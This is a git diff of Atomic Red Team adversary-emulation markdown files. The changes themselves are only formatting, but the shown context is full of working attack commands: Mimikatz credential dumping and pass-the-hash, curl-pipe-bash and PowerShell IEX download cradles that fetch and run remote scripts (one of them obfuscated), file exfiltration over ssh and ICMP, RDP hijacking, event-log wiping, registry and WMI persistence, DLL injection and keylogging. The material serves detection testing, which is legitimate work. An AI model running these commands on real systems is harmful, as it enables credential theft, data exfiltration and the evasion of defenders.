String | Ethernet0| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` c:\Program Files\Wireshark\tshark.exe -i #{interface} -c 5 c:\windump.exe ``` diff --git a/atomics/T1042/T1042.md b/atomics/T1042/T1042.md index 960fe846..6ecbbe9b 100644 --- a/atomics/T1042/T1042.md +++ b/atomics/T1042/T1042.md @@ -28,8 +28,7 @@ Change Default File Association From cmd.exe | extension_to_change | File Extension To Hijack | String | .wav| | target_exenstion_handler | Thing To Open | Path | C:\Program Files\Windows Media Player\wmplayer.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` cmd.exe /c assoc #{extension_to_change}="#{target_exenstion_handler}" ```
diff --git a/atomics/T1046/T1046.md b/atomics/T1046/T1046.md index 53abc0c4..146b6eaf 100644 --- a/atomics/T1046/T1046.md +++ b/atomics/T1046/T1046.md @@ -17,8 +17,7 @@ Scan ports to check for listening ports **Supported Platforms:** Linux, macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` for port in {1..65535}; do echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ; @@ -40,8 +39,7 @@ Scan ports to check for listening ports with Nmap. | port | Ports to scan. | string | 80| | host | Host to scan. | string | 192.168.1.1| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` nmap -sS #{network_range} -p #{port} telnet #{host} #{port} nc -nv #{host} #{port} diff --git a/atomics/T1047/T1047.md b/atomics/T1047/T1047.md index d94e6c0d..c31acd34 100644 --- a/atomics/T1047/T1047.md +++ b/atomics/T1047/T1047.md @@ -23,8 +23,7 @@ WMI List User Accounts **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` wmic useraccount get /ALL ```
@@ -36,8 +35,7 @@ WMI List Processes **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` wmic process get caption,executablepath,commandline ```
@@ -49,8 +47,7 @@ WMI List Software **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` wmic qfe get description,installedOn /format:csv ```
@@ -68,8 +65,7 @@ WMI List Remote Services | node | Ip Address | String | 192.168.0.1| | service_search_string | Name Of Service | String | sql server| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` wmic /node:"#{node}" service where (caption like "%#{service_search_string} (%") ```
diff --git a/atomics/T1048/T1048.md b/atomics/T1048/T1048.md index 902d12e8..9e515de1 100644 --- a/atomics/T1048/T1048.md +++ b/atomics/T1048/T1048.md @@ -30,8 +30,7 @@ Remote to Local | user_name | username for domain | string | atomic| | password | password for user | string | atomic| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz ```
@@ -52,8 +51,7 @@ Local to Remote | user_name | username for domain | string | atomic| | password | password for user | string | atomic| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc' ```
@@ -65,8 +63,7 @@ A firewall rule (iptables or firewalld) will be needed to allow exfiltration on **Supported Platforms:** macOS, CentOS, Ubuntu, Linux -#### Run it with these steps! -1. Victim System Configuration: +#### Run it with these steps! 1. Victim System Configuration: mkdir /tmp/victim-staging-area echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt @@ -96,8 +93,7 @@ Exfiltration of specified file over ICMP protocol. | input_file | Path to file to be exfiltrated. | Path | C:\Windows\System32\notepad.exe| | ip_address | Destination IP address where the data should be sent. | String | 1.1.1.1| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) } ```
diff --git a/atomics/T1049/T1049.md b/atomics/T1049/T1049.md index 320c6ca0..14f996f3 100644 --- a/atomics/T1049/T1049.md +++ b/atomics/T1049/T1049.md @@ -27,8 +27,7 @@ Get a listing of network connections. **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` netstat net use net sessions @@ -42,8 +41,7 @@ Get a listing of network connections. **Supported Platforms:** Windows -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` Get-NetTCPConnection ```
@@ -55,8 +53,7 @@ Get a listing of network connections. **Supported Platforms:** Linux, macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` netstat who -a ``` diff --git a/atomics/T1050/T1050.md b/atomics/T1050/T1050.md index c14e323d..48737b6c 100644 --- a/atomics/T1050/T1050.md +++ b/atomics/T1050/T1050.md @@ -25,8 +25,7 @@ Installs A Local Service | binary_path | Name of the service binary, include path. | Path | C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe| | service_name | Name of the Service | String | AtomicTestService| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` sc.exe create #{service_name} binPath= #{binary_path} sc.exe start #{service_name} sc.exe stop #{service_name} @@ -47,8 +46,7 @@ Installs A Local Service via PowerShell | binary_path | Name of the service binary, include path. | Path | C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe| | service_name | Name of the Service | String | AtomicTestService| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}" Start-Service -Name "#{service_name}" Stop-Service -Name "#{service_name}" diff --git a/atomics/T1053/T1053.md b/atomics/T1053/T1053.md index 2128963e..c7e828e2 100644 --- a/atomics/T1053/T1053.md +++ b/atomics/T1053/T1053.md @@ -22,8 +22,7 @@ Note: deprecated in Windows 8+ **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` at 13:20 /interactive cmd ```
@@ -40,8 +39,7 @@ at 13:20 /interactive cmd | task_command | What you want to execute | String | C:\windows\system32\cmd.exe| | time | What time 24 Hour | String | 72600| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} ```
@@ -62,8 +60,7 @@ Create a task on a remote system | user_name | Username DOMAIN\User | String | DOMAIN\user| | password | Password | String | At0micStrong| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} ```
diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md index 84785962..cc1b4048 100644 --- a/atomics/T1055/T1055.md +++ b/atomics/T1055/T1055.md @@ -48,8 +48,7 @@ Windows 10 Utility To Inject DLLS | dll_payload | DLL to Inject | Path | C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll| | process_id | PID of input_arguments | Int | $pid| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` mavinject $pid /INJECTRUNNING #{dll_payload} ```
@@ -67,8 +66,7 @@ PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/ | dll_payload | DLL to Inject | Path | T1055.dll| | process_id | PID of input_arguments | Int | $pid| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload} ```
@@ -85,8 +83,7 @@ This test adds a shared library to the `ld.so.preload` list to execute and inter |------|-------------|------|---------------| | path_to_shared_library | Path to a shared library object | Path | /tmp/evil_module.so| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` echo #{path_to_shared_library} > /etc/ld.so.preload ```
@@ -110,8 +107,7 @@ Excercises Five Techniques |------|-------------|------|---------------| | exe_binary | Output Binary | Path | T1055.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` .\bin\#{exe_binary} ```
diff --git a/atomics/T1056/T1056.md b/atomics/T1056/T1056.md index 7194584c..63326f2d 100644 --- a/atomics/T1056/T1056.md +++ b/atomics/T1056/T1056.md @@ -28,8 +28,7 @@ Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/ma |------|-------------|------|---------------| | filepath | Name of the local file, include path. | Path | c:\key.log| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` .\Get-Keystrokes.ps1 -LogPath #{filepath} ```
diff --git a/atomics/T1057/T1057.md b/atomics/T1057/T1057.md index 15500c54..2fbca057 100644 --- a/atomics/T1057/T1057.md +++ b/atomics/T1057/T1057.md @@ -28,8 +28,7 @@ Utilize ps to identify processes |------|-------------|------|---------------| | output_file | path of output file | path | /tmp/loot.txt| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` ps >> #{output_file} ps aux >> #{output_file} ``` diff --git a/atomics/T1059/T1059.md b/atomics/T1059/T1059.md index 77853262..40c6db1f 100644 --- a/atomics/T1059/T1059.md +++ b/atomics/T1059/T1059.md @@ -19,8 +19,7 @@ This will download the specified payload and set a marker file in `/tmp/art-fish **Supported Platforms:** macOS, CentOS, Ubuntu, Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` bash -c "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash" bash -c "wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Atomics/T1059/echo-art-fish.sh | bash" ``` diff --git a/atomics/T1060/T1060.md b/atomics/T1060/T1060.md index 22e08567..638e038b 100644 --- a/atomics/T1060/T1060.md +++ b/atomics/T1060/T1060.md @@ -42,8 +42,7 @@ Run Key Persistence |------|-------------|------|---------------| | command_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f ``` @@ -61,8 +60,7 @@ RunOnce Key Persistence |------|-------------|------|---------------| | thing_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.dll| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f ``` @@ -80,8 +78,7 @@ RunOnce Key Persistence via PowerShell |------|-------------|------|---------------| | thing_to_execute | Thing to Run | Path | powershell.exe| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce" set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"' Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force @@ -100,8 +97,7 @@ Add Shortcut To Startup via PowerShell |------|-------------|------|---------------| | thing_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.exe| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` $TargetFile = "$env:SystemRoot\System32\#{thing_to_execute}" $ShortcutFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Notepad.lnk" $WScriptShell = New-Object -ComObject WScript.Shell diff --git a/atomics/T1062/T1062.md b/atomics/T1062/T1062.md index 2ad7a808..c32bc853 100644 --- a/atomics/T1062/T1062.md +++ b/atomics/T1062/T1062.md @@ -24,8 +24,7 @@ Create a New-VM | vm_name | Create a new VM. | string | testvm| | file_location | Location of new VHDX file | string | C:\Temp\test.vhdx| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` Get-WindowsFeature -Name Hyper-V -ComputerName #{hostname} Install-WindowsFeature -Name Hyper-V -ComputerName #{hostname} -IncludeManagementTools New-VM -Name #{vm_name} -MemoryStartupBytes 1GB -NewVHDPath #{file_location} -NewVHDSizeBytes 21474836480 diff --git a/atomics/T1063/T1063.md b/atomics/T1063/T1063.md index ec6b93b5..1a7bdae2 100644 --- a/atomics/T1063/T1063.md +++ b/atomics/T1063/T1063.md @@ -29,8 +29,7 @@ Methods to identify Security Software on an endpoint **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` netsh.exe advfirewall firewall show all profiles tasklist.exe tasklist.exe | findstr /i virus @@ -47,8 +46,7 @@ Methods to identify Security Software on an endpoint **Supported Platforms:** Windows -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` get-process | ?{$_.Description -like "*virus*"} get-process | ?{$_.Description -like "*carbonblack*"} get-process | ?{$_.Description -like "*defender*"} @@ -63,8 +61,7 @@ Methods to identify Security Software on an endpoint **Supported Platforms:** Linux, macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` ps -ef | grep Little\ Snitch | grep -v grep ps aux | grep CbOsxSensorService ``` @@ -77,8 +74,7 @@ Discovery of an installed Sysinternals Sysmon service using driver altitude (eve **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` fltmc.exe | findstr.exe 385201 ```
diff --git a/atomics/T1064/T1064.md b/atomics/T1064/T1064.md index 7a363f99..fe2bda2b 100644 --- a/atomics/T1064/T1064.md +++ b/atomics/T1064/T1064.md @@ -19,8 +19,7 @@ Creates and executes a simple bash script. **Supported Platforms:** macOS, Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh" sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh" chmod +x /tmp/art.sh diff --git a/atomics/T1065/T1065.md b/atomics/T1065/T1065.md index 89643389..4fa3d0a2 100644 --- a/atomics/T1065/T1065.md +++ b/atomics/T1065/T1065.md @@ -23,8 +23,7 @@ Testing uncommonly used port utilizing PowerShell | port | Specify uncommon port number | String | 8081| | domain | Specify target hostname | String | google.com| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` test-netconnection -ComputerName #{domain} -port #{port} ```
@@ -42,8 +41,7 @@ Testing uncommonly used port utilizing telnet. | port | Specify uncommon port number | String | 8081| | domain | Specify target hostname | String | google.com| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` telnet #{domain} #{port} ```
diff --git a/atomics/T1069/T1069.md b/atomics/T1069/T1069.md index c3914d2a..b07a9673 100644 --- a/atomics/T1069/T1069.md +++ b/atomics/T1069/T1069.md @@ -31,8 +31,7 @@ Permission Groups Discovery **Supported Platforms:** macOS, Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` dscacheutil -q group dscl . -list /Groups groups @@ -46,8 +45,7 @@ Permission Groups Discovery for Windows **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` net localgroup net group /domain ``` @@ -65,8 +63,7 @@ Permission Groups Discovery utilizing PowerShell |------|-------------|------|---------------| | user | User to identify what groups a user is a member of | string | administrator| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` get-localgroup get-ADPrinicipalGroupMembership #{user} | select name ``` diff --git a/atomics/T1070/T1070.md b/atomics/T1070/T1070.md index b3b14332..4dbc93ea 100644 --- a/atomics/T1070/T1070.md +++ b/atomics/T1070/T1070.md @@ -44,8 +44,7 @@ Clear Windows Event Logs |------|-------------|------|---------------| | log_name | Windows Log Name, ex System | String | System| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` wevtutil cl #{log_name} ```
@@ -57,8 +56,7 @@ Manages the update sequence number (USN) change journal, which provides a persis **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` fsutil usn deletejournal /D C: ```
@@ -70,8 +68,7 @@ Delete system and audit logs **Supported Platforms:** macOS, Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` rm -rf /private/var/log/system.log* rm -rf /private/var/audit/* ``` @@ -89,8 +86,7 @@ This test overwrites the Linux mail spool of a specified user. This technique wa |------|-------------|------|---------------| | username | Username of mail spool | String | root| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` echo 0> /var/spool/mail/#{username} ```
@@ -107,8 +103,7 @@ This test overwrites the specified log. This technique was used by threat actor |------|-------------|------|---------------| | log_path | Path of specified log | Path | /var/log/secure| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` echo 0> #{log_path} ```
diff --git a/atomics/T1071/T1071.md b/atomics/T1071/T1071.md index f8dcf6f8..4af8746c 100644 --- a/atomics/T1071/T1071.md +++ b/atomics/T1071/T1071.md @@ -31,8 +31,7 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m |------|-------------|------|---------------| | domain | Default domain to simulate against | string | www.google.com| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null Invoke-WebRequest #{domain} -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null Invoke-WebRequest #{domain} -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null @@ -53,8 +52,7 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m |------|-------------|------|---------------| | domain | Default domain to simulate against | string | www.google.com| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` curl -s -A "HttpBrowser/1.0" -m3 #{domain} curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain} curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain} @@ -78,8 +76,7 @@ The intent of this test is to trigger threshold based detection on the number of | query_type | DNS query type | string | TXT| | query_volume | Number of DNS queries to send | integer | 1000| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` for($i=0; $i -le $#{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout} ```
@@ -102,8 +99,7 @@ This behaviour is typical of implants either in an idle state waiting for instru | c2_jitter | Percentage of jitter to add to the C2 interval to create variance in the times between C2 requests | integer | 20| | runtime | Time in minutes to run the simulation | integer | 30| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` .\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime} ```
@@ -123,8 +119,7 @@ The simulation involves sending DNS queries that gradually increase in length un | subdomain | Subdomain prepended to the domain name (should be 63 characters to test maximum length) | string | atomicredteamatomicredteamatomicredteamatomicredteamatomicredte| | query_type | DNS query type | string | TXT| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` .\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} ```
diff --git a/atomics/T1074/T1074.md b/atomics/T1074/T1074.md index e285a19a..1e80f23f 100644 --- a/atomics/T1074/T1074.md +++ b/atomics/T1074/T1074.md @@ -19,8 +19,7 @@ Utilize powershell to download discovery.bat and save to a local file **Supported Platforms:** Windows -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > c:\windows\pi.log ```
@@ -32,8 +31,7 @@ Utilize curl to download discovery.sh and execute a basic information gathering **Supported Platforms:** Linux, macOS -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.sh | bash -s > /tmp/discovery.log ```
diff --git a/atomics/T1075/T1075.md b/atomics/T1075/T1075.md index 49c3ee8b..8f4e0705 100644 --- a/atomics/T1075/T1075.md +++ b/atomics/T1075/T1075.md @@ -25,8 +25,7 @@ Note: must dump hashes first | domain | domain | string | atomic.local| | ntlm | ntlm hash | string | cc36cf7a8514893efccd3324464tkg1a| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm} ```
diff --git a/atomics/T1076/T1076.md b/atomics/T1076/T1076.md index eb583189..3af227f1 100644 --- a/atomics/T1076/T1076.md +++ b/atomics/T1076/T1076.md @@ -19,8 +19,7 @@ RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-r **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` query user sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55" net start sesshijack diff --git a/atomics/T1077/T1077.md b/atomics/T1077/T1077.md index 4ec1de97..70ff3218 100644 --- a/atomics/T1077/T1077.md +++ b/atomics/T1077/T1077.md @@ -29,8 +29,7 @@ Connecting To Remote Shares | password | Password | String | P@ssw0rd1| | computer_name | Target Computer Name | String | Target| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}" ```
@@ -49,8 +48,7 @@ Map Admin share utilizing PowerShell | computer_name | Target Computer Name | String | Target| | map_name | Mapped Drive Letter | String | g| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name} ```
diff --git a/atomics/T1081/T1081.md b/atomics/T1081/T1081.md index 178e0ad5..1a17db37 100644 --- a/atomics/T1081/T1081.md +++ b/atomics/T1081/T1081.md @@ -23,8 +23,7 @@ It is possible to extract passwords from backups or saved virtual machines throu **Supported Platforms:** macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` python2 laZagne.py all ```
@@ -41,8 +40,7 @@ Extracting credentials from files |------|-------------|------|---------------| | file_path | Path to search | String | /| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` grep -riP password #{file_path} ```
@@ -54,8 +52,7 @@ Mimikatz/kittenz - This will require a Mimikatz executable or invoke-mimikittenz **Supported Platforms:** Windows -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` invoke-mimikittenz mimikatz.exe ``` @@ -68,8 +65,7 @@ Extracting Credentials from Files **Supported Platforms:** Windows -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` findstr /si pass *.xml | *.doc | *.txt | *.xls ls -R | select-string -Pattern password ``` diff --git a/atomics/T1082/T1082.md b/atomics/T1082/T1082.md index de37361f..b979ad10 100644 --- a/atomics/T1082/T1082.md +++ b/atomics/T1082/T1082.md @@ -31,8 +31,7 @@ Identify System Info **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` systeminfo reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum ``` @@ -45,8 +44,7 @@ Identify System Info **Supported Platforms:** Linux, macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` systemsetup system_profiler ls -al /Applications @@ -60,8 +58,7 @@ Identify System Info **Supported Platforms:** Linux, macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` uname -a >> /tmp/loot.txt cat /etc/lsb-release >> /tmp/loot.txt cat /etc/redhat-release >> /tmp/loot.txt @@ -77,8 +74,7 @@ Identify virtual machine hardware. This technique is used by the Pupy RAT and ot **Supported Platforms:** Linux -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` cat /sys/class/dmi/id/bios_version | grep -i amazon cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware" cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU" @@ -97,8 +93,7 @@ Identify virtual machine guest kernel modules. This technique is used by the Pup **Supported Platforms:** Linux -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` sudo lsmod | grep -i "vboxsf\|vboxguest" sudo lsmod | grep -i "vmw_baloon\|vmxnet" sudo lsmod | grep -i "xen-vbd\|xen-vnif" diff --git a/atomics/T1083/T1083.md b/atomics/T1083/T1083.md index 9ca89f5c..64081726 100644 --- a/atomics/T1083/T1083.md +++ b/atomics/T1083/T1083.md @@ -29,8 +29,7 @@ Find or discover files on the file system **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` dir /s c:\ >> %temp%\download dir /s "c:\Documents and Settings" >> %temp%\download dir /s "c:\Program Files\" >> %temp%\download @@ -49,8 +48,7 @@ Find or discover files on the file system **Supported Platforms:** Windows -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` ls -recurse get-childitem -recurse gci -recurse @@ -70,8 +68,7 @@ https://perishablepress.com/list-files-folders-recursively-terminal/ **Supported Platforms:** macOS, Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` ls -a > allcontents.txt ls -la /Library/Preferences/ > detailedprefsinfo.txt file */* *>> ../files.txt @@ -89,8 +86,7 @@ Find or discover files on the file system **Supported Platforms:** macOS, Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > /tmp/loot.txt cat /etc/mtab > /tmp/loot.txt find . -type f -iname *.pdf > /tmp/loot.txt diff --git a/atomics/T1084/T1084.md b/atomics/T1084/T1084.md index bd651fa0..e07b36ed 100644 --- a/atomics/T1084/T1084.md +++ b/atomics/T1084/T1084.md @@ -25,8 +25,7 @@ https://github.com/EmpireProject/Empire/blob/master/data/module_source/persisten **Supported Platforms:** Windows -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; EventNameSpace='root\CimV2'; QueryLanguage="WQL"; @@ -58,8 +57,7 @@ https://github.com/EmpireProject/Empire/blob/master/data/module_source/persisten **Supported Platforms:** Windows -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" diff --git a/atomics/T1085/T1085.md b/atomics/T1085/T1085.md index c700033d..3ca3242e 100644 --- a/atomics/T1085/T1085.md +++ b/atomics/T1085/T1085.md @@ -24,8 +24,7 @@ Test execution of a remote script using rundll32.exe |------|-------------|------|---------------| | file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();" ```
diff --git a/atomics/T1086/T1086.md b/atomics/T1086/T1086.md index caa00b85..56dbeb9b 100644 --- a/atomics/T1086/T1086.md +++ b/atomics/T1086/T1086.md @@ -50,8 +50,7 @@ Download Mimikatz and dump credentials |------|-------------|------|---------------| | mimurl | Mimikatz url | url | https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds" ```
@@ -68,8 +67,7 @@ Download Bloodhound and run it |------|-------------|------|---------------| | bloodurl | BloodHound URL | url | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound" ```
@@ -82,8 +80,7 @@ Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FR **Supported Platforms:** Windows -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))) (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs() Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value))) @@ -97,8 +94,7 @@ Run mimikatz via PsSendKeys **Supported Platforms:** Windows -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` 